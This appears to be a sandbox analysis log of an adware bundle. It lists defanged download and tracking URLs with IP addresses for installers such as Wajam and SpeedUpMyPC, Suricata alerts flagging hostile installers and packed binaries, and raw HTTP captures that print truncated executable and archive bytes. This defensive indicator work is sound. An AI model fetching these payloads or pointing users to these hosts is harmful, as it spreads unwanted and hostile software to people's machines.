hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_30/Nsis/GetParameters 204.11.56.26
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_30/Nsis/PreRun 204.11.56.26
hxxp://staticrr.tgusrv.com/test.html
hxxp://dtrack.sslsecure1.com/test.html 204.11.56.26
hxxp://Track-903226030.us-west-2.elb.amazonaws.com/test.html
hxxp://API-XML-1918203848.us-west-2.elb.amazonaws.com/test.html
hxxp://API-XML-1918203848.us-west-2.elb.amazonaws.com/index.php/api/85/Java/195/286/English.xml
hxxp://staticrr.tgusrv.com//Dictionaries/English.xml
hxxp://e6337.g.akamaiedge.net/spidentifier/1.0.2.0/spidentifierimpl.exe
hxxp://e9287.g.akamaiedge.net//spidentifier/1.0.2.0/spidentifierimpl.exe
hxxp://jazz-1846647836.us-east-1.elb.amazonaws.com/
hxxp://d1o1q5i2ac5qv7.cloudfront.net/si/Bundle.exe
hxxp://cds.c5z6s5a3.hwcdn.net/ba/full/mon/setup.exe
hxxp://www.wajam-download.com/download/wajam_download.exe 54.208.23.129
hxxp://app.impsperf-users.com/installer.php
hxxp://cds.c5z6s5a3.hwcdn.net/ba/shop/mon/setup.exe
hxxp://cdn.best-tv.com.c.footprint.net/apps/dist/9020-2085_TheBestDeals.exe
hxxp://s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe
hxxp://splitter-load-balancer-1436536024.us-east-1.elb.amazonaws.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe
hxxp://s3-2-w.amazonaws.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe
hxxp://staticrr.tgusrv.com//Styles/Templates/d7d18a25_Win-Y.zip
hxxp://staticrr.tgusrv.com//Displays/Templates/8b4083bc_Win-Y-Yahoo.zip
hxxp://staticrr.tgusrv.com//Docking/Docking.zip
hxxp://staticrr.tgusrv.com//Styles/Softwares/82fb03ea_binghp4.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/7039a47f_display.html
hxxp://staticrr.tgusrv.com//Styles/Softwares/844a2c3b_browserapp.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/9103144e_display (1).html
hxxp://staticrr.tgusrv.com//Styles/Softwares/67423fe2_wajam.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/1f76ab55_display.html
hxxp://staticrr.tgusrv.com//Styles/Softwares/7a6c4a7c_genesis.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/6fe4b061_display.html
hxxp://staticrr.tgusrv.com//Styles/Softwares/9c04a3ed_thebestdeals.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/c9c92824_display.html
hxxp://staticrr.tgusrv.com//Styles/Softwares/e7bf26c3_mypcbackup.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/16220985_display.html
hxxp://staticrr.tgusrv.com//Styles/Softwares/db393704_vuupc.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/1d58e78d_display.html
hxxp://staticrr.tgusrv.com//Styles/Softwares/3a04fadf_speedupmypc.zip
hxxp://staticrr.tgusrv.com//Displays/Softwares/4d947901_display.html
hxxp://staticrr.paleokits.net//Styles/Softwares/9c04a3ed_thebestdeals.zip 85.12.5.27
hxxp://dl.newgenstatsnet.com/ba/shop/mon/setup.exe 69.16.175.10
hxxp://cdn4.vitaldownload.com/si/Bundle.exe 54.230.36.71
hxxp://api.v2.sslsecure2.com/test.html 204.11.56.26
hxxp://staticrr.paleokits.net//Styles/Softwares/e7bf26c3_mypcbackup.zip 85.12.5.27
hxxp://download.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe 107.21.127.37
hxxp://staticrr.paleokits.net//Displays/Softwares/9103144e_display (1).html 85.12.5.27
hxxp://track.v2.sslsecure3.com/test.html 204.11.56.26
hxxp://api.v2.sslsecure3.com/test.html 204.11.56.26
hxxp://staticrr.paleokits.net//Styles/Softwares/844a2c3b_browserapp.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Softwares/7039a47f_display.html 85.12.5.27
hxxp://get.ctx-genesis.com/installer.php 62.4.0.163
hxxp://staticrr.paleokits.net//Displays/Softwares/6fe4b061_display.html 85.12.5.27
hxxp://xml.collectioncss.net/apps/dist/9020-2085_TheBestDeals.exe 8.27.83.254
hxxp://staticrr.paleokits.net//Docking/Docking.zip 85.12.5.27
hxxp://sp-storage.spccinta.com//spidentifier/1.0.2.0/spidentifierimpl.exe 23.9.111.99
hxxp://staticrr.paleokits.net//Styles/Softwares/3a04fadf_speedupmypc.zip 85.12.5.27
hxxp://sp-storage.conduit-services.com/spidentifier/1.0.2.0/spidentifierimpl.exe 23.9.99.152
hxxp://staticrr.paleokits.net//Displays/Softwares/1d58e78d_display.html 85.12.5.27
hxxp://track.v2.sslsecure1.com/test.html 204.11.56.26
hxxp://staticrr.paleokits.net/test.html 85.12.5.27
hxxp://staticrr.paleokits.net//Styles/Softwares/67423fe2_wajam.zip 85.12.5.27
hxxp://api.v2.sslsecure1.com/test.html 204.11.56.26
hxxp://staticrr.paleokits.net//Displays/Softwares/1f76ab55_display.html 85.12.5.27
hxxp://api.v2.sslsecure4.com/test.html 54.213.138.138
hxxp://api.v2.sslsecure4.com/index.php/api/85/Java/195/286/English.xml 54.213.138.138
hxxp://staticrr.paleokits.net//Displays/Softwares/c9c92824_display.html 85.12.5.27
hxxp://dl.newgenstatsnet.com/ba/full/mon/setup.exe 69.16.175.10
hxxp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe 54.231.244.1
hxxp://staticrr.paleokits.net//Styles/Templates/d7d18a25_Win-Y.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Styles/Softwares/7a6c4a7c_genesis.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Styles/Softwares/82fb03ea_binghp4.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Softwares/4d947901_display.html 85.12.5.27
hxxp://track.v2.sslsecure4.com/test.html 54.201.5.113
hxxp://staticrr.paleokits.net//Styles/Softwares/db393704_vuupc.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Softwares/16220985_display.html 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Templates/8b4083bc_Win-Y-Yahoo.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Dictionaries/English.xml 85.12.5.27
hxxp://aff-software.s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe 205.251.242.131
hxxp://track.v2.sslsecure2.com/test.html 204.11.56.26
hxxp://sp-installer.conduit-data.com/ 54.243.77.179
s3.amazonaws.com 54.231.244.0


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:14 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:53 GMT
ETag: "66d4e-f0c0-4f9ee97e8ed40"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w1|VEXFs|VEXFs; path=/
Cache-control: private
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^.
.K.................b...........6............@.........................
.........`............................................................
..P...p...............................................................
.............................text....a.......b.................. ..`.r
data...............f..............@[email protected]..........
[email protected].................
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
[email protected]...`[email protected]
....E..9}[email protected].}[email protected]..
[email protected][email protected] ...Pj.h.[[email protected].@._^3.
[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET //Displays/Softwares/1d58e78d_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:26 GMT
Content-Type: text/html
Last-Modified: Fri, 10 Jan 2014 15:52:57 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
18ea...............r.Fr..5OQ..ks"H..$.B....P..rH..9.s..6.l...^...^..7~
.?..&~...V..n....{...* ....U8.....]]].=.q.oo.O...O....Swpp..H.?..L....
..K.1..\....&..l........y.4...u..m^....: ..{....`.#..^.-.vy....."[N.?e
..Ze..\...y..IQd..fm.v...'uz.f... .?....7.\.._..G.o...uv.cU....B.f^gY.
r.....j\...".\...q..B..9&...l......W-.Q.N..jD.../i....>. .....L.]Vf
..u..Z.8X..Y..,i.:k..n...o.y.4..Z,.....V...=.H......h}|tw....O........
...Y.......6....2....Cz.. .:.G...d...\x......UU...".g6.=W<..OU....8
.WA..^.....a.u...aU..Ev.....q.0..v.,...)._'e..e..Jn72l..q{.j.hz]'M....
re............................C6..#.6....Zg.61?..yw|#..j.F..|..g....(.
...........6....W......=2_f./.gl._|.N..z../......tm.s..q.W..X.m../0x..
.....E.zuy5;?=.@.....;7{.....S......;.9s'....;P...tsv...rv..~v........
.;9==..M.[W7..................=........Y.u;.....S7..q..I....[........w
?!....]|.........o ....).l...........;w>.w.o?.=...=so.xR"...~....G.
...CG~t==(H..^....:uW?.(........gw........%}:......FEi...C.m..~Y../...
..O.nf'@.|............n.y:;...$......l:Eb.8..Z....}...1..8.....".[An..
Cg.._..........U....^....../....E........t...K.....F1.....,...'...y!..
...x..zy2.oM^..iL...=....j.)$....  .......~|....?.*.2..[....>......
C."q...9..l....J.AF`.z.S.}...{..d..O..~....Vush..f..Zk..l,0y..x%3.Y.N.
:...d.}.`.J21ODd.wk...m.|.f.D.M.'-?d.........h.u...$..<.&Q..k.Di..u
.A.^R......h........GO..H........p...v..v{..e..u~.D...M.C.....<en..
0a"#a.......Y...=...)4.ZFc......T.W..,L0..)a...<.....8...... .m..J/
.X.'."..5IK........6eQ%>:.....M'......O^=.._O.1...\.......%"j."
<<< skipped >>>


GET //Styles/Softwares/7a6c4a7c_genesis.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: application/zip
Content-Length: 712
Last-Modified: Tue, 25 Mar 2014 18:45:40 GMT
Connection: close
ETag: "5331ced4-2c8"
Accept-Ranges: bytes
PK........3|yD................genesis.css.RAO*1.>C...'[email protected]..
...ew.m,.......m...=#.8....7.|.u~....=...^.............x\............B
.N:..?8:.N.Gt....F......d......,|.v......i..&m,FHk%5.QV....../.2d..~..
b.dO..f..O..Ba..|.....5.M{.V.....,.f..g8E...gN. ...fO.../I;.$.....&..-
B.9.2Rdy7...(.3J<s........C.XQJ.g..r .R..\.29jDYJ]......Q!.l]8.....
..E.....^.^......K..4.E... ,)...^.Hh.%Z.q..)YB."E.*zB..X.g...8I....ck.
.I:/...q....L........00.{.LPX..{....^?......==JW*.,k.kh..PK........Fv2
C................images/PK..........3|yD..............$....... .......
genesis.css.. .........*Tt.?H..c..h<H..c..h<H..PK..........Fv2C.
.............$...............images/.. ..........O.`~...c..h<H..c..
h<H..PK......................



GET //Docking/Docking.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:21 GMT
Content-Type: application/zip
Content-Length: 37048
Last-Modified: Tue, 26 Nov 2013 13:00:11 GMT
Connection: close
ETag: "52949b5b-90b8"
Accept-Ranges: bytes
PK........1Q.A..T.............position1A.css.....0.D..W\.n....H.Q... .
[email protected]"*..k.......9..]..t.jp.../.......6.<7Th...5L....}..E.. ....
L.S...........V*...8.;r...,6..r..'.?WC......yX.'c............&.XHA...P
K........,g.B^P.]............position2A.css.S.N.0.}n..b.K...m$p^v.j%^.
..~..............!.RB....c.9s.L~f...[r.....y.x..\.V.7d.-..L..}o.3k....
.....Dp.....99....x...P)3....(..V........EL..I..B.G.A..{.y........en..
..<.&.l...[..~.U..'..7..sCC.....O.Z....H.J..G.p;...`.>.....-V ..
g6R.......qQ%.Ua....E.7>..o...W.....f..k.L.ME.....cTSF.....s|....#.
.%....| ..hBv...Lqf([email protected]=...~P$<p.E...y.u..........W.k0[...w.Z....
..fye.../...&Q.....c.q........1.0.g..ay......|.gI....W.4...GJ...R..e..
.;.....}b.5.3.^\...A[..O.FX..'5o.%r......F..:[email protected]..
.........position2B.css.Q.N.0.....D..a..Fp.1B............]....mA......
$=.|?=.uF.U.....[ot..~...9Ld.Y.......N.y`~................#.||..j)y.(/
..n.....^....45.....\.."..k$. ...0..@C'.$....Q..V.:k&.Z%.U ?.X.-..F..E
.Ra.<u..;($g...}.......Ah...)...L.*5.Q0(.M.v.....t`....ho..........
d/4.p...A.7.....Ee.$*J...S..r.=.<.... l..%.|!j..6..c"...%:.d.......
Hen.[xK...O./....U.}fuV..PK.........lMBjre.....B.......position2C.css.
....0....S...bL/....A...P}....h3%....nE.*..Y...}.]..FZ.m7s:.%..0MS...P
Im.g....7...U..,VK..}....c..c..-b.g.FS...(.P.x.0.\.?\.'TS...k.2!WG4...
..#G%l.. .'.{.....ix...B.}a..m..R.v......(.........,..#E.3'8.._....?..
.z.PK........VG.@! h.............position3A.css..Qo.0....S.:...-..R...
......}..N.f|..k...}6Ic.%.:x;.......TT.l....._..Y._]..r._.x..Ppq.C
<<< skipped >>>


GET /si/Bundle.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: cdn4.vitaldownload.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 141824
Connection: close
Date: Sun, 19 Oct 2014 06:44:39 GMT
Last-Modified: Sun, 19 Oct 2014 06:39:02 GMT
ETag: "28d626b8c4722628cd8a6019b2f17acd"
Accept-Ranges: bytes
Server: AmazonS3
Age: 54377
X-Cache: Hit from cloudfront
Via: 1.1 d26e060bf36b2533ddf09498db6904d5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HlK6E0b-am78rKLDt3sNcWdEnMasYWHYzyKv8YzDAUbIVtGA39aCug==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......vMw 2,.s2,.s
2,.s;T.s3,.s.b.s0,.s]Z.s(,.s]Z.s.,.s]Z.s.,.s;T.s!,.s2,.s.,.s)..s<,.
s)..s3,.s)..s3,.sRich2,.s........PE..L...a[CT.........................
[email protected]............@............
..............................@..(....................P..p............
...........................@..........................................
..text............................... ..`.rdata...M.......N...........
.......@[email protected][email protected]...(....@.....
.................@[email protected]... [email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................V....3.;.t.QQQP....A..6
....A.^..D$...P.t$..t$...`......U..........u.2..&.E..E...u..E.....j..E
.Pj.Q....A.H....@]...V..Vh8.A.h .A..T*..YY...F.^.VWj....0-.....F.Y..t.
P...F...t.P...v...t.V.._^.VWj.....-.....F.Y..t.P...v...t.V.._^...d.A..
.d..V....d.A...d...D$..t.V..[..Y..^...V.t$...t*.Q....r.......;.r....r.
.......I...;.v.....2.^...V.t$...t .Q....r.......;.r....r........I...H;
.v.....2.^...U...M....3...t;......w....P..d..Y..u%.e...E.P.M...b..hH.A
..E.P.E.d.A..ad....U..3....9E.v8.}..w..u...c..Y..u%.e...E.P.M...b.
<<< skipped >>>


GET /test.html HTTP/1.1
Host: api.v2.sslsecure2.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:56 GMT
Server: Apache
Set-Cookie: vsid=905vr1614043164902767; expires=Sun, 20-Oct-2019 02:31:56 GMT; path=/; domain=api.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET //Styles/Softwares/67423fe2_wajam.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: application/zip
Content-Length: 111525
Last-Modified: Thu, 17 Jul 2014 09:09:05 GMT
Connection: close
ETag: "53c792b1-1b3a5"
Accept-Ranges: bytes
PK.........P.D.........0......wajam.css.Z[o.H.~&R..l.H..b.`...lD.UW.V.
t.gb...3.p...._f..xn....Rjl.e.|.;.....^....... }~......{w.^..~.G..M.w.
..(1q..........E//.qp....?/.*;../..%..g...^....'...._./..o.a..}.v.>
....v..O'..=D.4....o...EHO.....vy...s...G.ez.|.....<...K6A..Y|.5.o.
. ?...C.1 t....|..<..l...k...$.liYr..[.5>...k...........z.......
..e[J....C....k...P.".....Aw?.H.U...A.q....M....Z...a\Ci.EE.P....a....
..TD.....^K..(.....#Jv........F.a*.;.mL...][email protected].\.........L.(.Z.
A..2n.g2..y..._.A.......l.xa......|.............n..Uc1}.d^....,.$..i..
7....J;...I..Oap.B.F.......>...IR..#..%.2* 1eV..nhr..t.eQ..5wNFr..M
..i..i.{....".........o. .6,{..*..}.2..L/...q...o........h2.;.r.......
...&..{.......H..:....7uCg.o..&..X.......o.C.)7.`.).p....)..0...... v.
...T.UQi..../......2.-....M.....z....d.Es....J...u`,......k..,.Q.QT.a.
.....%..R.q..d...d.....}.fqk3.Q6F..1O.....2..B..wd.......=Um/.03H1....
..t......w.T$.......P.M.....v*y/Q.R.9.t.X..OFt.F...$..Zn..-.........\.
...d....rOg;...f..3...r.tw.p.....r.........6...:..%#......m..../....f.
...n.......tci.t.?.X.........z...y......'...K.vA..n.Z.....f>C, .P..
.O..D...D........s. ..kf...8^(....8 .qc6....0..NJ....../....Y..BW{....
.c...f7....n...?.......,v.A.&L...#j.&.`/.v*...|)Nr..E.>..6 ....&_..
I....af...:...V.*...h.......~6....=.ya.f.9;...Y|...:..$(.....6Lm-.7R5.
... 4;......<f%..A..`.J......9..............<."3?:D!^......Go...
QJ...2mV...>[g.?...O...^... PP.....=w#...n...}..~....P.[jx... ]g...
[email protected].../^..\.....y..OQ......d..>.I..'..
<<< skipped >>>


GET /si/Bundle.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: cdn4.vitaldownload.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 141824
Connection: close
Date: Sun, 19 Oct 2014 06:44:39 GMT
Last-Modified: Sun, 19 Oct 2014 06:39:02 GMT
ETag: "28d626b8c4722628cd8a6019b2f17acd"
Accept-Ranges: bytes
Server: AmazonS3
Age: 54377
X-Cache: Hit from cloudfront
Via: 1.1 7e54fc06cd70e4752fe050bbe5c130be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: O4aAH7j1ZV7a6KHkM4yeCsgXhRRXuw2BbQFvEGlw38nyz6Fy4utcaA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......vMw 2,.s2,.s
2,.s;T.s3,.s.b.s0,.s]Z.s(,.s]Z.s.,.s]Z.s.,.s;T.s!,.s2,.s.,.s)..s<,.
s)..s3,.s)..s3,.sRich2,.s........PE..L...a[CT.........................
[email protected]............@............
..............................@..(....................P..p............
...........................@..........................................
..text............................... ..`.rdata...M.......N...........
.......@[email protected][email protected]...(....@.....
.................@[email protected]... [email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................V....3.;.t.QQQP....A..6
....A.^..D$...P.t$..t$...`......U..........u.2..&.E..E...u..E.....j..E
.Pj.Q....A.H....@]...V..Vh8.A.h .A..T*..YY...F.^.VWj....0-.....F.Y..t.
P...F...t.P...v...t.V.._^.VWj.....-.....F.Y..t.P...v...t.V.._^...d.A..
.d..V....d.A...d...D$..t.V..[..Y..^...V.t$...t*.Q....r.......;.r....r.
.......I...;.v.....2.^...V.t$...t .Q....r.......;.r....r........I...H;
.v.....2.^...U...M....3...t;......w....P..d..Y..u%.e...E.P.M...b..hH.A
..E.P.E.d.A..ad....U..3....9E.v8.}..w..u...c..Y..u%.e...E.P.M...b.
<<< skipped >>>


GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:13 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807219"
Last-Modified: Mon, 20 Oct 2014 12:13:39 GMT
Cache-Control: max-age=2514
Content-Length: 11426128
Content-Type: application/x-msdownload
X-HW: 1413858733.dop007.ny2.t,1413858733.cds053.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
................ ..............................p......................
.G....................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected]......
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


GET /spidentifier/1.0.2.0/spidentifierimpl.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: sp-storage.conduit-services.com
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 301 Moved Permanently
Location: hXXp://sp-storage.spccinta.com//spidentifier/1.0.2.0/spidentifierimpl.exe
Server: BigIP
Content-Length: 0
Cache-Control: private, max-age=900
Expires: Tue, 21 Oct 2014 02:47:08 GMT
Date: Tue, 21 Oct 2014 02:32:08 GMT
Connection: close



GET //Styles/Softwares/3a04fadf_speedupmypc.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:26 GMT
Content-Type: application/zip
Content-Length: 45456
Last-Modified: Tue, 15 Oct 2013 12:35:00 GMT
Connection: close
ETag: "525d3674-b190"
Accept-Ranges: bytes
PK.........^OC................images/PK.........fJC..2.....T.......ima
ges/bullet-shortw.gifs.t..L.d.dh`d......#|..\.K....}EAbrvj.BRjzf......
..2Sl..M}.|..S32=..R...B....-S....l*.*r.rSK..*rs...*l..S..R..l.....XII
...#HB.d.s~Q.....n...........................X..Y.. @......4. .7.]@..R
FII...~yy.^..^~Q.....%..##]...........be......E..%..y. ~bR~i........pc
......K....H,.7.3.GR..._in.\uqIPj.~..!....A....E..@.. ..V.E..%.E!..9.P
..././../Pp.6S..ML....h.u..Zy...$.%.z..*.E.23S..L.,.M,..,....]....M...
.,......\.z.z]..KsS.J`zS.z-p..%............\....2q....yP.)..b.S.>.1
.hQ........p...I?5............~......._>.......o^.z.....O.?z.....wn
..y....W._.x....gN.:y....G..:x`...{v...c...[6o..a...kV.Z.b...K./Z.`...
sf..9c...S&O.8................................ ?/7'; 3#=-5%9)1!>.6&
:*2"<,4$8(0................................@_OWG[KSC]MUEYIQA^NVFZJR
B\LTDXHP.................A.'..dd.a..P.........{...........PK.........N
.CQ;..............images/speedupmypc-icon.png...v..PNG........IHDR....
.................pHYs................OiCCPPhotoshop ICC profile..x..Sg
TS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........
{.k........>...........H3Q5...B..........@..$p....d!s.#...~<<
 ".....x.....M..0.....B.\[email protected]..@F....&S....`.cb..P-.`'...
.....{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.
`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. [email protected]....
..........x.....6..._-...."[email protected]~..,/...;..m..%..h^..u..f..@..
...W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......
<<< skipped >>>


GET //Displays/Softwares/7039a47f_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: text/html
Last-Modified: Tue, 24 Jun 2014 10:07:27 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
62e.............W.n.7.][email protected]..*....d9AV.g..!...H..u.E..@....#.
)...K.....h...zeq..{.9...w..-..............}O....`...M...W.....]...U..
'..T^.J...z.j..I.6Nye.._..jJJT....`.M.... R.I. .e....:5.$o....*.......
MM....f.Q..}*.&.BT..6.-...0......G_V......U.).j...I.....d<...!..M(.
.x=.i).$ E..Y...<.I...^T....Rp.$*...t.H.JbLT...l..:<xqx....[....
.......t~..f....|A.....z:.......|....g.....\.;INj.z...efUi.....iA3k<
;>.I.....&Q.Z..c....G....d...J.a..'....p.#....{.....;......@dr)...=
[email protected].&..,k.8.........h.|a..Wk.....C......,..T=..Q..Qn....
.u..Ic..X...:K.5Y.....:..*.\......F#&....SC.v4m......?.}L4...La...{.RY
....JY"..HL.V...Yu'.........]..>....!(j.L.,.&..x .....xVJk......%..
...OQ. .!..J.iA..L.n.....(N...&/.a...$.4..@.%-.)..N.^..D.>.&t...Z..
..([email protected][...<.}).../D.....gaL.sD^.._...k...../HX
.........Z...._..(..R.J .~]....o`i.q...-.....1..V2....N...2..X.BE..Hno
.3G. ....[>.. 8.. .r.7..M..b.\Z.....*...;W;.\.&...%#...L.OH..%.b..R
..C......N..%..h.0.0F.`8X.c.y.9.hpe..k.God.K....\..K.s...J..|(z.......
...........q......0F.AL..,....?....`.....Nr..&.g...*C7...(......8....,
&...".>...X.08....#.{x..J.a.`R.....R.Y"...h..h..J..q...9......kr ..
.......p......C.>Wy......).h...V.....h&.m..;:/..^..4.]H.G..2..wY./n
}.I.^...k......B..s<*.6l...0"p..V...79...P*...P.m`$k......r......8.
_..../...<. 0X...kd....%....=.D.Qc.......y.Bp.....]b.......D..G.$r.
.V..P...b.C..2-.....0...;6.. |....k.[G.\'<p...I.hw.=.../..s........
b.A.<..W.....I..bP......!.^..:4...ek.?-s........-.^....gO.....O
<<< skipped >>>


GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:15 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<og7x..dx
..dx..d>_.dd..dqv.dy..d>_.d)..d>_.d...dqv.du..dx..d...du\.dq.
.du\.dy..du\.dy..dRichx..d........PE..L.....;T.................r...j..
[email protected]............@...........
..........................d....p..........................\...........
............................@.........................................
...text....p.......r.................. ..`.rdata..X............v......
........@[email protected][email protected]
[email protected]......................@[email protected]..
\[email protected]......................................
......................................................................
......................................................................
......................................................................
........................................................U..Q3..E...]..
..U.....V..c...]..U..Q3..E...]....U.....W......h..U...k.....].....U...
..W......h..U..ik.....].....U.....W......h..U..Ik.....].....U..j....W.
.....]................U..j....W..a...]................U..j....W..A...]
